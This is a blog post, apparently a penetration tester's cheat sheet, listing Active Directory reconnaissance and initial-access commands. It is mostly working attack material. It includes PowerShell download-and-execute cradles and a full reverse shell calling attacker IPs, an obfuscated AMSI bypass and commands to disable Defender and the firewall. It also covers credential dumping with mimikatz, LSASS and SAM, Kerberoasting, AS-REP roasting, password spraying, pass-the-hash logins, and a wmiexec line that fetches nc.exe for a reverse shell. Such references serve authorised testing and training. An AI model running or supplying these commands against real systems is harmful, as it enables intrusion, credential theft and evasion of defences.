Active Directory Penetration Testing Cheat Sheet - Recon & Initial Access

Hello Everyone, I am back after a long time. Today' post is on Active directory reconnaissance and gaining initial foot hold into the target active directory network. here I am going to share the commands and steps for many attacks where I assume that you already have access to the network.

if you are at a right place if you are searching for Active Directory Penetration testing cheat sheet. If you are are looking for privilege escalation cheat sheet - refer to the post Windows Privilege Escalation & Linux Privilege Escalation





THIS IS MERELY CREATED FOR EDUCATIONAL & ETHICAL PURPOSE ONLY, AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY THE VISITORS

  
Download Reverse Shells on the target machine

#download and execute the script

powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10/powerrev.ps1')

#Run the shell in memory
powershell.exe iex(invoke-webrequest("http://10.10.10.10:8001/powerrev.ps1") -UseBasicParsing))

powershell.exe iex(iwr(http://10.10.10.10:8001/powerrev.ps1) -usebasicparsing)

#download the rev shell on the target and save it
powershell.exe Invoke-WebRequest http://10.10.10.10/powerrev.ps1 -OutFile c:\temp\powerrev.ps1
powershell.exe c:\temp\powerrev.ps1

#Another way of downloading a file
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"

# Download and execute Automatically
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile -

#Powershell V3
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1')


$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://10.10.14.9:8000/ipw.ps1',$false);$h.send();iex $h.responseText
$wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr.GetResponse() IEX ([System.IO.StreamReader]($r.GetResponseStream())).ReadToEnd()
Powershell Revere Shell

powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',5985);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Local user & Group Enum

whoami /priv

whoami /groups echo %USERNAME% || whoami $env:username
Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name net user UserName /domain #Basic Group Enumeration
net localgroup Get-LocalGroup | ft Name net localgroup "Remote Management Users" #Password Requirements
net accounts #Create a New account net user /add bhanu Bhanu@1234 net localgroup administrators bhanu /add

Network Enumeration

#List all network interfaces, IP, and DNS. ipconfig /all Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address Get-DnsClientServerAddress -AddressFamily IPv4 | ft #List current routing table route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex #List the ARP table arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State #List all current connections netstat -ano #Powershell Ping Sweep 1..255 | % {echo "192.168.1.$_"; ping -n 1 -w 100 192.168.1.$_} | Select-String ttl #List firewall state and current configuration netsh advfirewall firewall dump or netsh firewall show state netsh firewall show config #List firewall's blocked ports $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports #Disable firewall netsh firewall set opmode disable netsh advfirewall set allprofiles state off #Disable AntiVirus/ Windows Defender/ Firewall Set-MpPreference -DisableRealtimeMonitoring $true Set-MpPreference -DisableIOAVProtection $true netsh advfirewall set allprofiles state off} #Disable AMSI sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) or [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) #Enable RDP on the target machine sc stop WinDefend netsh advfirewall show allprofiles netsh advfirewall set allprofiles state off netsh firewall set opmode disable reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable proxychains rdesktop 10.10.10.10 -u Bhanu -p Bhanu@1234
#List all network shares net share #SNMP Configuration reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse

Ldap Enumeration:

ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt Dumping passwords using LDAP: ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ldapsearch -x -h 10.10.10.254 -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd

Domain Enumeration with RPcclient

#Enum using Null Session rpcclient -U "" 10.10.10.10

#Login as a user

rpcclient -U USERNAME //10.10.10.10 #Find Users in the domain rpcclient -Uuser_Name%PASSWORD -c enumdomusers 10.10.10.10 #Find Domian Info rpcclient -Uuser_Name%PASSWORD -c querydominfo 10.10.10.10 #Find Groups and their Alias rpcclient -Uuser_Name%PASSWORD -c "enumalsgroups builtin" 10.10.10.10 #Find more info using Alias and note SIDs rpcclient -Uuser_Name%PASSWORD -c "queryaliasmem builtin 0x244" 10.10.10.10 #Find more info using SIDs rpcclient $> lookupsids S-1-5-21-586154515854-343543654-8743952433-1105

#Reset other Users Password
rpcclient -U user1 //10.10.10.10
setuserinfo2 USER2 23 'PASSWORD'

Enum using RPCClient


rpcclient -U DOMAIN\\Username 10.10.10.10 #Enter pass

enumdomusers #Enumerate Domain Users

enumprivs        #Enum Privileges

enumprinters    #Enum Printers
Gaining Hashes from SAM/System

reg save HKLM\SAM C:\sam
reg save HKLM\SYSTEM C:\system

impacket-secretsdump -sam SAM -system SYSTEM local


Note: if the hash starts with 31d6, the password is either blank or the account is disabled. 

decrypt the hash from http://hashes.org/search.php

Login with the HASH:

smbmap -u USER_NAME -p WHAT_EVER:THE_HASH_IS -H IP_ADDRESS

pwdump SYSTEM SAM > sam.txt
samdump2 SYSTEM SAM -o sam.txt
john -format=NT sam.txt

Dumping Hashes using CME

Download CME from here #Dump SAM Hashes cme smb 10.10.10.10/24 -u Username -p Password --sam # Dump LSA cme smb 10.10.10.10/24 -u Username -p Password --lsa #Dump ntds.dit from DC cme smb 10.10.10.10/24 -u Username -p Password --ntds

Dumping Credentials using mimikatz

mimikatz.exe privilege::debug /You should see 200 OK sekurlsa::logonpasswords /dump creds and other info lsadump::sam                 /Dump creds stored in LSa sekurlsa::tickets /view available tickets sekurlsa::tickets /export /Download all the tickets or #Dumping Creds using Mimikatz Powershell Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' #collect the NTLM hashes and it can be cracked using john/hashcat or crackstation hashcat -m 1000 -a 3 hashes.txt rockyou.txt john --format=LM hashes.txt --wordlist=rockyou.txt

Dumping Creds if you find lsass.dmp

#Download procdump.exe on the target machine procdump.exe -accepteula -ma lsass.exe lsass.dmp or rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump <LSASS.EXE_PID> lsass.dmp full mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full
Find Passwords in Registry

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server /v PasswordViewOnly"
vncpwd.exe PASSWORD_FROM_ABOVE

# SNMP Parameters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

#Winscp
reg query "HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP" 2\Sessions

To decrypt winscp keys,copy the username,hostname and encrypted password and use github-winscppassworddecrypt
# Search for password in registry
reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s 

Credentials in Credential Manger

cmdkey /list dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\  #run as admin using previously saved creds runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\noob\root.txt"
Powershell Sudo For Windows

$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}' 

powershell -ExecutionPolicy Bypass -File xyz.ps1

Basic AD Enum After Initial Access using AD Module

#Get Domain Details
$ADClass = [System.DirectoryServices.ActiveDirectory.Domain]
$ADclass::GetCurrentDomain()


#Loading AD Modules
Import-Module Microsoft.ActiveDirectory.Management.dll -Verbose
Import-Module ActiveDirectory.psd1
-Verbose

User Enumeration

#View all users in Domain
get-aduser

#View all user properties
get-aduser -Identity kyomah -Properties *

#ALL user Objects

Get-ADUser -Filter * -Properties * |select -First 1 | Get-Member -MemberType *Property | select Name

#Find Last Password set date

Get-ADUser -Filter * -Properties * |select name, @{expression={[datetime]::fromFileTime($_pwdlsatset)}}

#View Account Descriptions to check for stored passwords
Get-ADUser -Filter 'Description -like "*pass*"' -Properties Description | select name,Description

#Finding user accounts used as Service accounts
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName


Computer Enumeration

#view all computer names
Get-ADComputer -Filter * | select name

#Find Windows 2012 Servers
Get-ADComputer -Filter 'OperatingSystem -like "*2019*"' -Properties OperatingSystem | select Name,OperatingSystem

#Check if machines is online/pingable
Get-ADComputer -Filter * -Properties DNSHostName |%{Test-Connection -Count 1 -ComputerName $_.DNSHostName}

User Groups Enumeration

#Find all groups in the Domain
Get-ADGroup -Filter * |select name

#Get verbose info about groups
Get-ADGroup -Filter * -Properties *

#Find Complete info about specific group

Get-ADGroup -Identity 'Enterprise Admins' -Properties *
Get-ADGroup -Filter 'Name -like "*admin*"'| select Name

Group Membership Enum

#Find the members of a group
Get-ADGroupMember -Identity 'Enterprise Admins' -Recursive | select SamAccountName

#Find the groups a user is member of

Get-ADPrincipalGroupMembership -Identity UserName | select name

GPO Enumeration:

#Get GPO list in current domain

Get-gpo -all

#Restricted policy
Get-NetGPOGroup

#Finding OUS
Get-ADOrganizationalUnit -Filter * -Properties *

Forest Enumeration

#Domain Trust Mapping

Get-ADTrust -Identity steins.local

#Forest Details
Get-ADForest
Get-AdForest -Identity Steins.local

#Get all domains in current forest

(Get-ADForest).Domains

#Get all Global catalogs for current forest

Get-ADForest | select -ExpandProperty GlobalCatalogs

#Map Trusts of Forests

Get-ADTrust -Filter 'msDS-TrustForestTrustinfo -ne "$null"'

Basic AD Enum After Initial Access using PowerView

powershell.exe -ep bypass SET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} ) Import-Module ./PowerView.ps1

#Get the list of domains Get-Domain

Computer Enumeration

#View all the computers in the domain
Get-DomainComputer | Select name Get-DomainComputer -Name dc.steins.local #check connection to the computers in the domain Get-DomainComputer -Ping

#List the users in the domain
Get-DomainUser Get-DomainUser -Name User1

#View all the shares of the comupters
Find-DomainShare
Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC
Get-NetfileServer --help


#List all groups on a machine:
Get-netlocalgroup -ComputerName steinsdc -ListGroups

#Find Computers where Domain admin (user/group) has sessions
Invoke-UserHunter -GroupName "RDPUsers"

#Find Computers where domain admin is logged in
Invoke-UserHunter -Stealth

#Finding user accounts used as Service accounts
Get-NetUser -SPN Get-DomainUser -SPN

Group Enumeration

#Get all the groups in the current domain Get-DomainGroup #Get Groups members from a domain group Get-DomainGroupMember -Name "Domain Admins" -Recurse #Get all the groups a user is part of Get-DomainGroup -username "user2" #Get all the members of the Domain Admins group Get-NetGroupMember -GroupName "Domain Admins" Get-NetGroupMember -GroupName "Domain Admins" -Recurse Get-NetGroupMember -GroupName "Enterprise Admins" -Domain <DOmain name here> #Get the group membership for a user: Get-DomainGroup –UserName "student1"

GPO Enumeration

#View Domain GPO Get-DomainGPO | Select displayname Get-NetGPO #View the GPO policies for assigned for a computer Get-DomainGPO -ComputerName dc.steins.local #Get the available global catalogs info - DC's info Get-ForestGlobalCatalog #Find machines where the given user is member of a specific group Find-GPOLocation -UserName USERNAME -Verbose

Share Enumeration

#Get all the shares in the domain Find-DomainShare -Verbose Get-DomainFileServer -Verbose Invoke-ShareFinder -Verbose Invoke-ShareFinder -Verbose -ExcludeStandard -ExcludePrint -ExcludeIPC #Find Sensitive Files on computers in the domain Invoke-FileFinder -Verbose #Search for file servers, high value targets: Get-NetfileServer -Verbose

ACL Enumeration

#Get ACLs associated with the specified object Get-ObjectAcl -SamAccounntName USERNAME -ResolveGUIDs #Get the ACLs associated with the specified prefix Get-ObjectAcl -ADSprefix 'CN=Administrator,CN=Users' -verbose #View a users ACls: (Get-Acl 'AD:\CN=Houin Kyoma,CN=Users,DC=STEINS,DC=local').Access #get the ACLs associated with the specified LDAP path to be used for search. Get-ObjectACL -ADSpath "LDAP://CN=Domain Admins,CN=Users,DC=DC,DC=Steins,DC=local" -ResolveGUIDs -Verbose #Search for interesting ACEs -write, modify Invoke-ACLScanner -ResolveGUIDs #GenericWrite for all users > under advanced > Write all properties Get-ObjectAcl -SamAccountName * –ResolveGUIDs | ? { ($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1070240333-336889418-1185445934-1603') }

User Hunting

creates lot of noise, incase SMB is disbaled, you can run the below https://jdhitsolutions.com/blog/wp-content/uploads/2011/07/get-wmiadmin.txt --> import the script #Finding machines with local admin access as current user on current domain: Find-LocalAdminAccess -Verbose #If SMB/RPC are closed on the servers, we can use Find-WMILocalAdminAccess.ps1 #get the list of computers in the domain. Get-NetComputer #find local admin access on a list of computers Find-WMILocalAdminAccess -ComputerFile ./computers.txt -Verbose Find-WMILocalAdminAccess -ComputerName starkt

PowerView

#Find local admins on all machines Invoke-EnumerateLocalAdmin -Verbose Find Computers where Domain admin (user/group) has sessions: below command gets Get-NetGroupMember & Get-NetComputer from DC and goes to each and every machines and lists their sessions and logged on users and tries to inject session. #Find session of "domain admins" group on all the machines in the domain Invoke-UserHunter -Verbose #Find session of domain admin on all the machines in a particular group Invoke-UserHunter -GroupName "RDPUsers" #Find Computers where domain admin is logged in: checks only high valued targets Invoke-UserHunter -Stealth
#Find Domain users location in the domain Find-DomainUserLocation

Creds Sniffing when SMB Signing is not required/ Disbaled

responder -I tun0 -F --lm -d -w -i KALI_IP

net use \\10.10.14.239
#on target machine or Access SMB

OR
responder -I tun0 -rPv


#NTLMv2 Hash
hashcat -m 5600 hash ~/Downloads/rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule

Running Commands as other user using powershell

$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force $Cred = New-Object System.Management.Automation.PSCredential('Domain\UserName', $SecPassword) Get-aduser -Identity user1 -Credential $Cred

Kerberoasting
Save the TGS to the disk and brute force it. DC identifies the service account by ServicePrincipalName but service accounts password are freaking hard to crack in most of the cases.
Find users with SPN's set to their Accounts

#import the module and Find the users
Import-Module .\GetUserSPNs.ps1

or
#AD module
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

or
#Poweview
Get-NetUser -SPN
Get TGS Using GetUserSPNs.py
sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark
Get TGS Using AD Module #request the TGS using AD Module, use the SPN name found using above commands

powershell.exe -exec bypass -c "Add-Type -AssemblyName System.IdentityModel; New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '
SPNNAME/hostname.steins.LOCAL:1433' " Get TGS Using PowerView Request-SPNTicket
Get TGS Using Invoke-Kerberoast Import-Module
.\Invoke-Kerberoast.ps1
#Generate the hash
Invoke-Kerberoast -OutputFormat Hashcat

Get TGS Using Rubeus .\Rubeus.exe kerberoast /domain:steins.local /user:username/format:hashcat /outfile:hash.txt #Export the ticket from memory to disk using mimikatz Invoke-Mimikatz -Command '"Kerberos::list /export"'

#Cracking the hash
hashcat -m 13100 -a 0 ticket.hashcat /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule --force

or
hashcat -a 0 -m 13100
ticket.hashcat /usr/share/wordlists/rockyou.txt -r/usr/share/hashcat/rules/d3ad0ne.rule --force

or

hashcat -a 0 -m 13100 hash ~/Downloads/Tools/rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force

or hashcat -m 13100 krb5t_hash rockyou.txt --force or python tgscrack.py wordlist.txt hash.txt

Targeted Kerberosting - AS-REPs Roasting

Find users with -PreAuthNotRequiered set or users to which we have acecss to Genric All/Generic Write ACL set. Step- 1 - Finding Users with PreAuth not required (Skip to Step-5 if you find any users) #Powerview - Finding users with PreauthNotRequired set
Get-DomainUser -PreauthNotRequired -Verbose #AD Module - Finding users with PreauthNotRequired set
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuths Step - 2 - Finding users to Abuse #Finding Users with enough persmissions to modify acls powerview_dev.ps1 Invoke-ACLScanner -ResolveGUIds | {$_.IdentityReferenceName -match "RDPUsers"} #Finding Objects with GenericWrite Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite')} #Finding users with GenericAll Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll')} #or check if anything matches with your SID (for ease of access) Get-ObjectAcl -SamAccountName * -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericWrite') -and ($_.SecurityIdentifier -match 'S-1-5-21-1087654965-336889418-4984984984-1501')} Step - 3 Disabling Pre-Auth #PowerView : Disabling PreAuth for Kerberos Powerview.exe Set-DomainObject -Identity USER_NAME -XOR @{useraccountcontrol=4194304} -Verbose #Using AD Module Disabling PreAuth for Kerberos Set-ADAccountControl -Identity Administrator -doesnotrequirepreauth $true
Step - 4 - Validating the changes
#Find the users with PreAuth Not Required Get-DomainUser -PreAuthNotRequired -Verbose Step - 5 - Getting the AS-REP #Using ASREPRoast.ps1 Requesting AS-REP for offline bruteforcing: Get-ASREPhash -Username USER_NAME -Verbose Invoke-ASREPRoast -Verbose OR #Using Rubeus for Requesting AS-REP for offline bruteforcing: remove all the spaces from the hash before bruteforcing
Rubeus.exe asreproast /user:UserName OR Rubeus.exe asreproast /user:Administrator /format:hashcat /outfile:hash.txt Step - 6 - Cracking the hash #Copy the hash and crack it using John john krbhash --wordlist=wordlist.txt #Cracking using Hashcat; add $23 after $krb5asrep if you do not export the hash as hashcat format hashcat -m18200 hash -a 3 rockyou.txt hashcat -m18200 hash rockyou.txt -r /usr/share/hashcat/rules/d3ad0ne.rule --force

Kerberoasting - Set SPN

Step -1 #PowerView - Find users with GenericAll Permissions Set Invoke-ACLScanner -ResolveGUIds | {$_.IdentityReferenceName -match "RDPUsers"} #AD Module - Find the user without SPN Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName Step -2 #AD Module - Set SPN for a User (Must be Unique for the domain) Set-ADUser -Identity USER_NAME -ServicePrincipalNames @{Add='DomainName/SomeUniqueName'}
#PowerView - Set SPN for a User Set-DomainObject -Identity USER_NAME -Set @{serviceprincialName = 'DomainName/SomeUniqueName'} Step -3 #Validate SPN Set to the username Get-ADUser -Identity USER_Name -Properties ServicePrincipalName | Select ServicePrincipalName Step -4 #Requesting TGS using AD Module Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosReceiverSecurityToken -ArgumentList DomainName/SomeUniqueName" #Get TGS Using PowerView Request-SPNTicket #Get TGS Using Invoke-Kerberoast Import-Module .\Invoke-Kerberoast.ps1 #Generate the hash Invoke-Kerberoast -OutputFormat Hashcat #Get TGS Using Rubeus .\Rubeus.exe kerberoast /domain:steins.local /user:username/format:hashcat /outfile:hash.txt Step -5 #check the TGS for DomainName/SomeUniqueName klist #Export the tickets Invoke-Mimikatz -Command '"kerberos::list /export"' Step -6 #Crack the TGS python tgscrack.py wordlist.txt hash_fileName Log generated is 4769 for Adding DoNotPre-Auth on target user
Brute Forcing Kerberos

kerbrute userenum --dc 10.10.10.10 -d steins.local users.txt 

Download Kerbrute from here
kerbrute userenum --domain htb.local /usr/share/SecLists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.10 
 
ASREP Roast via Linux: Get users hash from a DoNotPre-Auth user

sudo GetNPUsers.py STEINS-DC.LOCAL/ -usersfile users.txt -outputfile hashes.txt -dc-ip 10.10.10.10

sudo john hash --format=krb5asrep --wordlist=rockyou.txt 
# better copy rockyou.txt to the same location  
ASREP Roast as an Authenticated user 

python3 GetNPUsers.py steins.local/user:"password!" -dc-ip 10.10.10.10 -request
 
Updating Time to Match DC - KRB_AP_ERR_SKEW(Clock skew too great)

#Display the time of the server
proxychains net time -S 10.10.10.10

or

#Get DC time from curl response headers
proxychains curl DC_IP:5985 -v

sudo date -s "Thu Dec 24
10.10.10.10"

Password Spraying

Import-Module PowerView.ps1 #list all domain users and save them to a text file PowerShell Get-DomainUser | select samaccountname Import-Module DomainPasswordSpray.ps1 Invoke-DomainPasswordSpray -UserList users.txt -Password 'P@$$W0rd!' -OutFile sprayed-creds.txt or proxychains crackmapexec smb 10.10.10.10 -d steins.local -u users.txt -p 'p@$$w0rd1' --continue-on-success
Open a Shell using creds: 

#if Port 5985 is open, we can login into winrm

sudo evil-winrm -u USERNAME -p PASSWORD -i 10.10.10.10

or

evil-winrm -u username -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.10
or psexec.py USERNAME@10.10.10.10 or sudo secretsdump.py USERNAME@10.10.10.10 OR login to the machine and ./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"; or
evil-winrm -i 10.10.10.10 -u administrator -p aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

or
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6 steins.local/administrator@10.10.10.10

or


.\SharpDPAPI.exe machinecredentials psexec.py Administrator@10.10.10.10 -hashes LMHASH:NTHASH
Enumerating AD Recycle Bin Group

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

#Now check for users passwords. might come in handy sometimes
Get-ADObject -filter { SAMAccountName -eq "UserName" } -includeDeletedObjects -property *
RCE using wmiexec

proxychains wmiexec.py -debug -nooutput domain/username:'password'@TARGET_ip "powershell.exe Invoke-WebRequest -Uri 'http://KALI_ip/nc.exe' -OutFile 'C:\Windows\System32\spool\drivers\color\nc.exe'; cmd.exe /c C:\Windows\System32\spool\drivers\color\nc.exe -e cmd.exe KALI_IP 9001"


That’s it for this post Active Directory Penetration Testing - Recon & Initial Access. If you are are looking for privilege escalation cheat sheet - refer to the post Windows Privilege Escalation & Linux Privilege Escalation Let me know if I missed any initial recon commands. I’ll add it to the list. I will continue the lateral movement and maintaining persistence in another post. Until then. see ya 






Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment